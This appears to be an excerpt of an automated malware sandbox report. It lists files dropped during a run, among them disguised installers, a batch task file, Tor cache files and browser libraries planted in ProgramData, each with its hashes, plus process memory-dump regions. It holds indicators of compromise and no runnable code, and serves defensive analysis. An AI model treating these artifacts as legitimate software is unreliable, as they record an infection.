SHA512 f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

memory/2112-304-0x0000000000400000-0x0000000000818000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-HULTP.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe

MD5 d6a44cb46e22e52e6ae7699df00aff0c
SHA1 673bec2a169902d60693d643709e39697eb89f5d
SHA256 1ccf222e70e9355a0e613ca5aface891a0f5954709783af6e8d3cc7e77de0903
SHA512 7712d7500c916c5c054af6eaa9cc7b2c79940987b424741437fcb9711b031eda733e8648d6d98001b1699d5851a15009b7d644d1d8c5d77db0b1b1cbc325ec0f

memory/4028-313-0x0000000000AA0000-0x0000000000BA0000-memory.dmp

memory/4028-314-0x00000000009B0000-0x00000000009E4000-memory.dmp

C:\ProgramData\PowerGo 65.0 Build 2191 Essential\PowerGo 65.0 Build 2191 Essential.exe

MD5 fada8299f81bc97239ccc89216e0b4fa
SHA1 00624aa0100cb9f99c686ffb198fcc0637ca88c1
SHA256 1b4d46f3f8d2f05f45ce3177dba6d073c69d7ef0fb588a6f24b5cd21c037c514
SHA512 641d99dac805213639924ac4ac7cad077eb5305c36ba80c901aeda15b6c26f9157d0f53c77f2b6cba96c5930e527f9410bb91ba3d57b2a43ff4bc5ffe5e457a4

memory/2528-321-0x0000000000400000-0x0000000000746000-memory.dmp

C:\ProgramData\PowerGo 65.0 Build 2191 Essential\PowerGo 65.0 Build 2191 Essential.exe

MD5 4617dbc8951eddf1fe5dab811b723656
SHA1 5f913773f53c14756d86f83a367d6ccd5414d890
SHA256 94f12195d7856af7682c83cee20feadad653b665be20b34926e2b4bfbc452da6
SHA512 d400071495c21c157fb7bb260e7c81e22f0514974e346c55aa4748bf735e89b10032c9b8206f4ed129f5b1d9cf8b27e50a47234e37a976f682e66202ef340f75

memory/3728-317-0x0000000002930000-0x0000000002D32000-memory.dmp

memory/3728-324-0x0000000002E40000-0x000000000372B000-memory.dmp

memory/4576-325-0x0000000000400000-0x0000000000736000-memory.dmp

C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe

MD5 02f3e6d054e90c6c1eada0c65a891983
SHA1 2035d08206d0b0a3e5cdc371a2e8080a640767da
SHA256 bac19b0a6599bd7fd326962b2d7a3fb48b5569750213326a59bfc036f1c695d5
SHA512 d0ec819402faac2980ebed8cdcd888b11c037d45cdfaca1d191ed7adfd83c0b56e80bee51761fe7bfbc7a2db8f0881ec3240e922aa8a627fa9a26c8dd07b4ae6

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

memory/2528-323-0x0000000000400000-0x0000000000746000-memory.dmp

C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe

MD5 a1ff11eff193c71c6f89137810e815b6
SHA1 aaf45193b3d6c8d1132b5913468529c558ab4b29
SHA256 fff272794d0c37f88dfeb66c0e0558940363e4588df861e81ee3dd184a1ed620
SHA512 c4607fd58299eb2d7d7fe41973b092f9b117c56d2d7c0ae947473e001644eb0fc93c39182d75dcc271ed124c400764f10014b93cb1793cacada14eda43a62f18

memory/3728-329-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4028-315-0x0000000000400000-0x0000000000822000-memory.dmp

memory/4768-331-0x0000000000400000-0x0000000000746000-memory.dmp

memory/4576-332-0x0000000000400000-0x0000000000736000-memory.dmp

memory/1752-362-0x0000000005420000-0x0000000005456000-memory.dmp

memory/1752-373-0x0000000005B40000-0x0000000006168000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

MD5 d55ee5772fcd405ac78c0373e623225a
SHA1 97838497f873a11f6ae11fc94fca7e894c627b20
SHA256 23b204bef4d3bd1c77e0f109cdeff2283b154b761ecf5aaf257e8a01e51a642d
SHA512 72699c06ff55fbc55a0da920616200af0df9d2445a012d38622a3d19ad02393dea940ecac86b341342d50802eb4a361b704dea94bc4069efa292c033607833ba

memory/1752-380-0x0000000005500000-0x0000000005510000-memory.dmp

memory/1752-379-0x0000000005500000-0x0000000005510000-memory.dmp

memory/1752-374-0x00000000720C0000-0x0000000072870000-memory.dmp

memory/1752-387-0x00000000059E0000-0x0000000005A02000-memory.dmp

memory/1752-388-0x00000000062E0000-0x0000000006346000-memory.dmp

memory/1752-389-0x0000000006350000-0x00000000063B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ahrbry3n.524.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1752-402-0x00000000064C0000-0x0000000006814000-memory.dmp

memory/1752-407-0x00000000069D0000-0x00000000069EE000-memory.dmp

memory/1752-408-0x0000000006A00000-0x0000000006A4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 34a5f0536b29f422791ed3ec981d9207
SHA1 64fa0071934c54c73ece83fedb778214cf1b5c76
SHA256 812083411a43af4959e7e6faf797840f8c81a33ea76d989c3c3d03c878cbb90a
SHA512 dc81118268c0db10bf2fc2d413f16fa02efc80d20801000454592f0812b1d09bc3f8dae3808b91effa101a9dd9fd79df5e52922964d55cc1f867e2e48aaf3da1

memory/1752-424-0x0000000006F10000-0x0000000006F54000-memory.dmp

memory/1752-435-0x0000000005500000-0x0000000005510000-memory.dmp

memory/1752-442-0x0000000007CE0000-0x0000000007D56000-memory.dmp

C:\ProgramData\nss3.dll

MD5 dfe7fca6d4752b0da274a41d5e2d5189
SHA1 d763b8002f7b04f0786a529fa4d62e766931ec78
SHA256 4aca2aeb6c394f38092a733906c5e4601370b4082f8670623920552704f12c40
SHA512 18356de8953a0714600ac2468a0780ed91f6970b252680ff90e55cfdc48114c0867d673f13e8df3903cd2ac3e11b2591403bd2c37aa00d8a38d18cf7e7ca7b5f

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Roaming\uhgjcbw

MD5 3151d44dd03886e5f64f34481b116c81
SHA1 ebef87d5fd54925493385fbff5ba4d175c046fbc
SHA256 d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c
SHA512 6ebcb293583a6858a023bf71a347783b788064f9415421503155e2f87426ff52d7881f2a680331d4332e4062153901295f4b92771a1afd527624bb15230bbcc6

memory/1752-465-0x0000000007D80000-0x0000000007D9A000-memory.dmp

memory/1752-464-0x00000000083E0000-0x0000000008A5A000-memory.dmp

memory/2612-470-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

memory/1752-471-0x0000000007F40000-0x0000000007F72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 d122f827c4fc73f9a06d7f6f2d08cd95
SHA1 cd1d1dc2c79c0ee394b72efc264cfd54d96e1ee5
SHA256 b7a6dcfdd64173ecbcef562fd74aee07f3639fa863bd5740c7e72ddc0592b4fc
SHA512 8755979d7383d6cb5e7d63798c9ca8b9c0faeec1fe81907fc75bbbb7be6754ab7b5a09a98492a27f90e3f26951b6891c43d8acd21414fb603cd86a4e10dac986

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b